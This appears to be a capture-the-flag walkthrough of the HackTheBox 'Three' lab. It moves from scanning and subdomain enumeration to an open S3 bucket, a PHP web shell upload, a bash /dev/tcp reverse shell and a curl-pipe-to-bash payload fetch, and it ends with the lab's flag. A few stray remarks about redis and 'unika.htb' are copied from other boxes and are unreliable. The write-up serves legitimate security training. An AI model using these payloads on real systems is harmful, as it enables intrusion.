05.THREE (AWS S3 BUCKET)

Cloud, Custom Applications, AWS, AWS Reconnaissance, Web Site Structure Discovery, Bucket Enumeration, Arbitrary File Upload, Anonymous/Guest Access

Previous04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)Next06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)

Last updated 2 months ago

05.THREE (AWS S3 BUCKET)

Cloud, Custom Applications, AWS, AWS Reconnaissance, Web Site Structure Discovery, Bucket Enumeration, Arbitrary File Upload, Anonymous/Guest Access

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 22,80
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
 |   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
 |_  256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 |_http-server-header: Apache/2.4.29 (Ubuntu)
 |_http-title: The Toppers
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,80
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.35.157
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.35.157:80/
 |     Form id: 
 |_    Form action: /action_page.php
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-enum: 
 |_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}

 * identified domain as thetoppers.htb from the contact section
 
root@htb:~$ echo "10.129.35.157     thetoppers.htb" | sudo tee -a /etc/hosts
 10.129.35.157     thetoppers.htb
 
root@htb:~$ BROWSER > http://unika.htb

 * possible vulnerable entry points
    - buy tickets form
    - contact web form
       - could be vulnerable to XSS, etc

#subdomain enumeration
root@htb:~$ locate subdomains-top1million-5000.txt
 /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

root@htb:~$ cp /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt .
root@htb:~$ which gobuster
 /usr/bin/gobuster

root@htb:~$ gobuster vhost -u http://thetoppers.htb -w subdomains-top1million-5000.txt --append-domain
 Found: s3.thetoppers.htb Status: 404 [Size: 21]
 Found: gc._msdcs.thetoppers.htb Status: 400 [Size: 306]
 Progress: 4989 / 4990 (99.98%)
 
 * the vhost represents virtual host routing
 * the -w represents the path to the wordlist
 * the -u represents the target URL
 * gobuster version 3.2.0 requires the use of --append-domain option to account the known vHost
    - Host: [word].thetoppers.htb
    - the --append-domain option is only required when conducting subdomain enumeration NOT directory brute forcing
    
 * typically, subdomains are assigned different IP addresses; however, 
   virtual host routing (aka host-based routing) could be configured where
   one server having one IP address handles multiple subdomains
    - with vhost, the server uses the Host header in the HTTP request to 
      determine which application is meant to handle the request instead
      of having subdomains assigned to different IP addresses
      
root@htb:~$ echo "10.129.35.157 s3.thetoppers.htb" | sudo tee -a /etc/hosts
 10.129.35.157 s3.thetoppers.htb
 
root@htb:~$ BROWSER > s3.thetoppers.htb
 {"status": "running"}

 * AWS S3 bucket is a cloud-based object storage service that allows the storage
   of files (aka objects) in containers called buckets.
    - these can be used for backup & storage, media hosting, software delivery,
      static website, etc

#install awscli
root@htb:~$ which awscli
root@htb:~$ apt install awscli
root@htb:~$ which aws
 /usr/local/bin/aws
 
root@htb:~$ aws configure
 AWS Access Key ID [None]: {null}
 AWS Secret Access Key [None]: {null}
 Default region name [None]: {null}
 Default output format [None]: {null}

 * {arbitrary values} are used if the target server isn't properly configured, it doesn't check for authentication

#connection & enumeration
root@htb:~$ aws --endpoint=http://s3.thetoppers.htb s3 ls
 * this cmd lists all S3 buckets hosted by the server
 
root@htb:~$ aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
                            PRE images/
 2025-02-21 21:53:28          0 .htaccess
 2025-02-21 21:53:29      11952 index.php

 * this cmd lists objects and common prefixes under the specified bucket

#exploitation
root@htb:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php

root@htb:~$ aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
 upload: ./shell.php to s3://thetoppers.htb/shell.php
 
 * this cmd uploads the php shell to the target's s3 bucket
 
#RCE
root@htb:~$ curl http://thetoppers.htb/shell.php?cmd=id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
 * this is a non-interactive shell as it runs a single command per request 
   and returns the result. there's no back-and-forth, ongoing interaction 
   like in a terminal or shell.
 
#REVERSE SHELL
root@htb:~$ ifconfig
 tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
 inet 10.10.14.215  netmask 255.255.254.0  destination 10.10.14.215
root@htb:~$ nano revShell.sh
 #!/bin/bash
 bash -i >& /dev/tcp/10.10.14.215/1337 0>&1


root@htb:~$ nc -nlvp 1337
 * this is an interactive shell where it keeps the connection open, allowing 
   for multiple commands to be sent and results to be returned in a more 
   dynamic way

root@htb:~$ python3 -m http.server 8000

#URL encode the payload
root@htb:~$ cyberchef.io
 input: http://thetoppers.htb/shell.php?cmd=curl 10.10.14.215:8000/revShell.sh | bash
 recipe: URL encode
 output: http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.215:8000/revShell.sh%20%7C%20bash
 
root@htb:~$ curl http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.215:8000/revShell.sh%20%7C%20bash

 * since the reverse shell is a bash script, it must be piped to bash
   IOT execute it
   
www-data@three:/var/www/html$ locate flag.txt
 /var/www/flag.txt
 
www-data@three:/var/www/html$ cat ../flag.txt
 a980d99281a28d638ac68b9bf9453c2b